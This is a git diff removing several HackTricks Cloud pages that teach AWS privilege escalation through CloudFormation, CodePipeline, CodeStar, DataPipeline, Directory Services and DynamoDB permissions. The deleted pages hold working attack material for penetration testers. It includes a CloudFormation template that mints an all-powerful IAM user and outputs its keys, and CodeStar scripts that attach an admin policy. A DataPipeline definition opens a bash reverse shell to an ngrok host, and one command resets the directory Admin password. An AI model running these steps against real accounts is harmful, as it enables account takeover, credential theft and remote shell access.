-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md deleted file mode 100644 index 8147ce381..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-cloudformation-privesc/iam-passrole-cloudformation-createstack-and-cloudformation-describestacks.md +++ /dev/null @@ -1,109 +0,0 @@ -# iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -An attacker could for example use a **cloudformation template** that generates **keys for an admin** user like: - -```json -{ - "Resources": { - "AdminUser": { - "Type": "AWS::IAM::User" - }, - "AdminPolicy": { - "Type": "AWS::IAM::ManagedPolicy", - "Properties": { - "Description" : "This policy allows all actions on all resources.", - "PolicyDocument": { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": [ - "*" - ], - "Resource": "*" - }] - }, - "Users": [{ - "Ref": "AdminUser" - }] - } - }, - "MyUserKeys": { - "Type": "AWS::IAM::AccessKey", - "Properties": { - "UserName": { - "Ref": "AdminUser" - } - } - } - }, - "Outputs": { - "AccessKey": { - "Value": { - "Ref": "MyUserKeys" - }, - "Description": "Access Key ID of Admin User" - }, - "SecretKey": { - "Value": { - "Fn::GetAtt": [ - "MyUserKeys", - "SecretAccessKey" - ] - }, - "Description": "Secret Key of Admin User" - } - } -} -``` - -Then **generate the cloudformation stack**: - -```bash -aws cloudformation create-stack --stack-name privesc \ - --template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \ - --role arn:aws:iam::[REDACTED]:role/adminaccess \ - --capabilities CAPABILITY_IAM --region us-west-2 -``` - -**Wait for a couple of minutes** for the stack to be generated and then **get the output** of the stack where the **credentials are stored**: - -```bash -aws cloudformation describe-stacks \ - --stack-name arn:aws:cloudformation:us-west2:[REDACTED]:stack/privesc/b4026300-d3fe-11e9-b3b5-06fe8be0ff5e \ - --region uswest-2 -``` - -### References - -* [https://bishopfox.com/blog/privilege-escalation-in-aws](https://bishopfox.com/blog/privilege-escalation-in-aws) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert 
(GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md
deleted file mode 100644
index d9fdae9de..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codepipeline-privesc.md
+++ /dev/null
@@ -1,63 +0,0 @@
-# AWS - Codepipeline Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## codepipeline
-
-For more info about codepipeline check:
-
-{% content-ref url="../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md" %}
-[aws-datapipeline-codepipeline-codebuild-and-codecommit.md](../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md)
-{% endcontent-ref %}
-
-### `iam:PassRole`, `codepipeline:CreatePipeline`, `codebuild:CreateProject, codepipeline:StartPipelineExecution`
-
-When creating a code pipeline you can indicate a **codepipeline IAM Role to run**, therefore you could compromise them.
-
-Apart from the previous permissions you would need **access to the place where the code is stored** (S3, ECR, github, bitbucket...)
-
-I tested this doing the process in the web page, the permissions indicated previously are the not List/Get ones needed to create a codepipeline, but for creating it in the web you will also need: `codebuild:ListCuratedEnvironmentImages, codebuild:ListProjects, codebuild:ListRepositories, codecommit:ListRepositories, events:PutTargets, codepipeline:ListPipelines, events:PutRule, codepipeline:ListActionTypes, cloudtrail:`
-
-During the **creation of the build project** you can indicate a **command to run** (rev shell?) and to run the build phase as **privileged user**, that's the configuration the attacker needs to compromise:
-
-![](<../../../.gitbook/assets/image (276).png>)
-
-![](<../../../.gitbook/assets/image (181).png>)
-
-### ?`codebuild:UpdateProject, codepipeline:UpdatePipeline, codepipeline:StartPipelineExecution`
-
-It might be possible to modify the role used and the command executed on a codepipeline with the previous permissions.
-
-### `codepipeline:pollforjobs`
-
-[AWS mentions](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html):
-
-> When this API is called, CodePipeline **returns temporary credentials for the S3 bucket** used to store artifacts for the pipeline, if the action requires access to that S3 bucket for input or output artifacts. This API also **returns any secret values defined for the action**.
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md
deleted file mode 100644
index 106d50e48..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/README.md
+++ /dev/null
@@ -1,99 +0,0 @@
-# AWS - Codestar Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Codestar - -You can find more information about codestar in: - -{% content-ref url="codestar-createproject-codestar-associateteammember.md" %} -[codestar-createproject-codestar-associateteammember.md](codestar-createproject-codestar-associateteammember.md) -{% endcontent-ref %} - -### `iam:PassRole`, `codestar:CreateProject` - -With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. Check the following page: - -{% content-ref url="iam-passrole-codestar-createproject.md" %} -[iam-passrole-codestar-createproject.md](iam-passrole-codestar-createproject.md) -{% endcontent-ref %} - -### `codestar:CreateProject`, `codestar:AssociateTeamMember` - -This technique uses `codestar:CreateProject` to create a codestar project, and `codestar:AssociateTeamMember` to make an IAM user the **owner** of a new CodeStar **project**, which will grant them a **new policy with a few extra permissions**. - -```bash -PROJECT_NAME="supercodestar" - -aws --profile "$NON_PRIV_PROFILE_USER" codestar create-project \ - --name $PROJECT_NAME \ - --id $PROJECT_NAME - -echo "Waiting 1min to start the project" -sleep 60 - -USER_ARN=$(aws --profile "$NON_PRIV_PROFILE_USER" opsworks describe-my-user-profile | jq .UserProfile.IamUserArn | tr -d '"') - -aws --profile "$NON_PRIV_PROFILE_USER" codestar associate-team-member \ - --project-id $PROJECT_NAME \ - --user-arn "$USER_ARN" \ - --project-role "Owner" \ - --remote-access-allowed -``` - -If you are already a **member of the project** you can use the permission **`codestar:UpdateTeamMember`** to **update your role** to owner instead of `codestar:AssociateTeamMember` - -**Potential Impact:** Privesc to the codestar policy generated. 
You can find an example of that policy in: - -{% content-ref url="codestar-createproject-codestar-associateteammember.md" %} -[codestar-createproject-codestar-associateteammember.md](codestar-createproject-codestar-associateteammember.md) -{% endcontent-ref %} - -### `codestar:CreateProjectFromTemplate` - -1. **Create a New Project:** - * Utilize the **`codestar:CreateProjectFromTemplate`** action to initiate the creation of a new project. - * Upon successful creation, access is automatically granted for **`cloudformation:UpdateStack`**. - * This access specifically targets a stack associated with the `CodeStarWorker--CloudFormation` IAM role. -2. **Update the Target Stack:** - * With the granted CloudFormation permissions, proceed to update the specified stack. - * The stack's name will typically conform to one of two patterns: - * `awscodestar--infrastructure` - * `awscodestar--lambda` - * The exact name depends on the chosen template (referencing the example exploit script). -3. **Access and Permissions:** - * Post-update, you obtain the capabilities assigned to the **CloudFormation IAM role** linked with the stack. - * Note: This does not inherently provide full administrator privileges. Additional misconfigured resources within the environment might be required to elevate privileges further. - -For more information check the original research: [https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/](https://rhinosecuritylabs.com/aws/escalating-aws-iam-privileges-undocumented-codestar-api/).\ -You can find the exploit in [https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar\_createprojectfromtemplate\_privesc/CodeStarPrivEsc.py](https://github.com/RhinoSecurityLabs/Cloud-Security-Research/blob/master/AWS/codestar_createprojectfromtemplate_privesc/CodeStarPrivEsc.py) - -**Potential Impact:** Privesc to cloudformation IAM role. 
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md
deleted file mode 100644
index 883d19f18..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/codestar-createproject-codestar-associateteammember.md
+++ /dev/null
@@ -1,115 +0,0 @@
-# codestar:CreateProject, codestar:AssociateTeamMember
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -This is the created policy the user can privesc to (the project name was `supercodestar`): - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "1", - "Effect": "Allow", - "Action": [ - "codestar:*", - "iam:GetPolicy*", - "iam:ListPolicyVersions" - ], - "Resource": [ - "arn:aws:codestar:eu-west-1:947247140022:project/supercodestar", - "arn:aws:events:eu-west-1:947247140022:rule/awscodestar-supercodestar-SourceEvent", - "arn:aws:iam::947247140022:policy/CodeStar_supercodestar_Owner" - ] - }, - { - "Sid": "2", - "Effect": "Allow", - "Action": [ - "codestar:DescribeUserProfile", - "codestar:ListProjects", - "codestar:ListUserProfiles", - "codestar:VerifyServiceRole", - "cloud9:DescribeEnvironment*", - "cloud9:ValidateEnvironmentName", - "cloudwatch:DescribeAlarms", - "cloudwatch:GetMetricStatistics", - "cloudwatch:ListMetrics", - "codedeploy:BatchGet*", - "codedeploy:List*", - "codestar-connections:UseConnection", - "ec2:DescribeInstanceTypeOfferings", - "ec2:DescribeInternetGateways", - "ec2:DescribeNatGateways", - "ec2:DescribeRouteTables", - "ec2:DescribeSecurityGroups", - "ec2:DescribeSubnets", - "ec2:DescribeVpcs", - "events:ListRuleNamesByTarget", - "iam:GetAccountSummary", - "iam:GetUser", - "iam:ListAccountAliases", - "iam:ListRoles", - "iam:ListUsers", - "lambda:List*", - "sns:List*" - ], - "Resource": [ - "*" - ] - }, - { - "Sid": "3", - "Effect": "Allow", - "Action": [ - "codestar:*UserProfile", - "iam:GenerateCredentialReport", - "iam:GenerateServiceLastAccessedDetails", - "iam:CreateAccessKey", - "iam:UpdateAccessKey", - "iam:DeleteAccessKey", - "iam:UpdateSSHPublicKey", - "iam:UploadSSHPublicKey", - "iam:DeleteSSHPublicKey", - "iam:CreateServiceSpecificCredential", - "iam:UpdateServiceSpecificCredential", - "iam:DeleteServiceSpecificCredential", - "iam:ResetServiceSpecificCredential", - "iam:Get*", - "iam:List*" - ], - "Resource": [ - "arn:aws:iam::947247140022:user/${aws:username}" - ] - } - ] -} -``` - -{% hint 
style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md
deleted file mode 100644
index 60d1b28c4..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codestar-privesc/iam-passrole-codestar-createproject.md
+++ /dev/null
@@ -1,118 +0,0 @@
-# iam:PassRole, codestar:CreateProject
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -With these permissions you can **abuse a codestar IAM Role** to perform **arbitrary actions** through a **cloudformation template**. - -To exploit this you need to create a **S3 bucket that is accessible** from the attacked account. Upload a file called `toolchain.json` . This file should contain the **cloudformation template exploit**. The following one can be used to set a managed policy to a user under your control and **give it admin permissions**: - -{% code title="toolchain.json" %} -```json -{ - "Resources": { - "supercodestar": { - "Type": "AWS::IAM::ManagedPolicy", - "Properties": { - "ManagedPolicyName": "CodeStar_supercodestar", - "PolicyDocument": { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": "*", - "Resource": "*" - } - ] - }, - "Users": [ - "" - ] - } - } - } -} -``` -{% endcode %} - -Also **upload** this `empty zip` file to the **bucket**: - -{% file src="../../../../.gitbook/assets/empty.zip" %} - -Remember that the **bucket with both files must be accessible by the victim account**. 
- -With both things uploaded you can now proceed to the **exploitation** creating a **codestar** project: - -```bash -PROJECT_NAME="supercodestar" - -# Crecte the source JSON -## In this JSON the bucket and key (path) to the empry.zip file is used -SOURCE_CODE_PATH="/tmp/surce_code.json" -SOURCE_CODE="[ - { - \"source\": { - \"s3\": { - \"bucketName\": \"privesc\", - \"bucketKey\": \"empty.zip\" - } - }, - \"destination\": { - \"codeCommit\": { - \"name\": \"$PROJECT_NAME\" - } - } - } -]" -printf "$SOURCE_CODE" > $SOURCE_CODE_PATH - -# Create the toolchain JSON -## In this JSON the bucket and key (path) to the toolchain.json file is used -TOOLCHAIN_PATH="/tmp/tool_chain.json" -TOOLCHAIN="{ - \"source\": { - \"s3\": { - \"bucketName\": \"privesc\", - \"bucketKey\": \"toolchain.json\" - } - }, - \"roleArn\": \"arn:aws:iam::947247140022:role/service-role/aws-codestar-service-role\" -}" -printf "$TOOLCHAIN" > $TOOLCHAIN_PATH - -# Create the codestar project that will use the cloudformation epxloit to privesc -aws codestar create-project \ - --name $PROJECT_NAME \ - --id $PROJECT_NAME \ - --source-code file://$SOURCE_CODE_PATH \ - --toolchain file://$TOOLCHAIN_PATH -``` - -This exploit is based on the **Pacu exploit of these privileges**: [https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam\_\_privesc\_scan/main.py#L1997](https://github.com/RhinoSecurityLabs/pacu/blob/2a0ce01f075541f7ccd9c44fcfc967cad994f9c9/pacu/modules/iam__privesc_scan/main.py#L1997) On it you can find a variation to create an admin managed policy for a role instead of to a user. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md
deleted file mode 100644
index 4e5b80724..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-datapipeline-privesc.md
+++ /dev/null
@@ -1,100 +0,0 @@
-# AWS - Datapipeline Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## datapipeline - -For more info about datapipeline check: - -{% content-ref url="../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md" %} -[aws-datapipeline-codepipeline-codebuild-and-codecommit.md](../aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md) -{% endcontent-ref %} - -### `iam:PassRole`, `datapipeline:CreatePipeline`, `datapipeline:PutPipelineDefinition`, `datapipeline:ActivatePipeline` - -Users with these **permissions can escalate privileges by creating a Data Pipeline** to execute arbitrary commands using the **permissions of the assigned role:** - -```bash -aws datapipeline create-pipeline --name my_pipeline --unique-id unique_string -``` - -After pipeline creation, the attacker updates its definition to dictate specific actions or resource creations: - -```json -{ - "objects": [ - { - "id" : "CreateDirectory", - "type" : "ShellCommandActivity", - "command" : "bash -c 'bash -i >& /dev/tcp/8.tcp.ngrok.io/13605 0>&1'", - "runsOn" : {"ref": "instance"} - }, - { - "id": "Default", - "scheduleType": "ondemand", - "failureAndRerunMode": "CASCADE", - "name": "Default", - "role": "assumable_datapipeline", - "resourceRole": "assumable_datapipeline" - }, - { - "id" : "instance", - "name" : "instance", - "type" : "Ec2Resource", - "actionOnTaskFailure" : "terminate", - "actionOnResourceFailure" : "retryAll", - "maximumRetries" : "1", - "instanceType" : "t2.micro", - "securityGroups" : ["default"], - "role" : "assumable_datapipeline", - "resourceRole" : "assumable_ec2_profile_instance" - }] -} -``` - -{% hint style="info" %} -Note that the **role** in **line 14, 15 and 27** needs to be a role **assumable by datapipeline.amazonaws.com** and the role in **line 28** needs to be a **role assumable by ec2.amazonaws.com with a EC2 profile instance**. - -Moreover, the EC2 instance will only have access to the role assumable by the EC2 instance (so you can only steal that one). 
-{% endhint %} - -```bash -aws datapipeline put-pipeline-definition --pipeline-id \ - --pipeline-definition file:///pipeline/definition.json -``` - -The **pipeline definition file, crafted by the attacker, includes directives to execute commands** or create resources via the AWS API, leveraging the Data Pipeline's role permissions to potentially gain additional privileges. - -**Potential Impact:** Direct privesc to the ec2 service role specified. - -## References - -* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md
deleted file mode 100644
index 33898f048..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-directory-services-privesc.md
+++ /dev/null
@@ -1,60 +0,0 @@
-# AWS - Directory Services Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %} - -## Directory Services - -For more info about directory services check: - -{% content-ref url="../aws-services/aws-directory-services-workdocs-enum.md" %} -[aws-directory-services-workdocs-enum.md](../aws-services/aws-directory-services-workdocs-enum.md) -{% endcontent-ref %} - -### `ds:ResetUserPassword` - -This permission allows to **change** the **password** of any **existent** user in the Active Directory.\ -By default, the only existent user is **Admin**. - -``` -aws ds reset-user-password --directory-id --user-name Admin --new-password Newpassword123. -``` - -### AWS Management Console - -It's possible to enable an **application access URL** that users from AD can access to login: - -
-
-And then **grant them an AWS IAM role** for when they login, this way an AD user/group will have access over AWS management console:
-
-
-
-There isn't apparently any way to enable the application access URL, the AWS Management Console and grant permission
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md
deleted file mode 100644
index 3fedf519a..000000000
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-dynamodb-privesc.md
+++ /dev/null
@@ -1,49 +0,0 @@
-# AWS - DynamoDB Privesc
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-
-{% endhint %}
-
-## dynamodb
-
-For more info about dynamodb check:
-
-{% content-ref url="../aws-services/aws-dynamodb-enum.md" %}
-[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md)
-{% endcontent-ref %}
-
-### Post Exploitation
-
-As far as I know there is **no direct way to escalate privileges in AWS just by having some AWS `dynamodb` permissions**. You can **read sensitive** information from the tables (which could contain AWS credentials) and **write information on the tables** (which could trigger other vulnerabilities, like lambda code injections...) but all these options are already considered in the **DynamoDB Post Exploitation page**:
-
-{% content-ref url="../aws-post-exploitation/aws-dynamodb-post-exploitation.md" %}
-[aws-dynamodb-post-exploitation.md](../aws-post-exploitation/aws-dynamodb-post-exploitation.md)
-{% endcontent-ref %}
-
-### TODO: Read data abusing data Streams
-
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
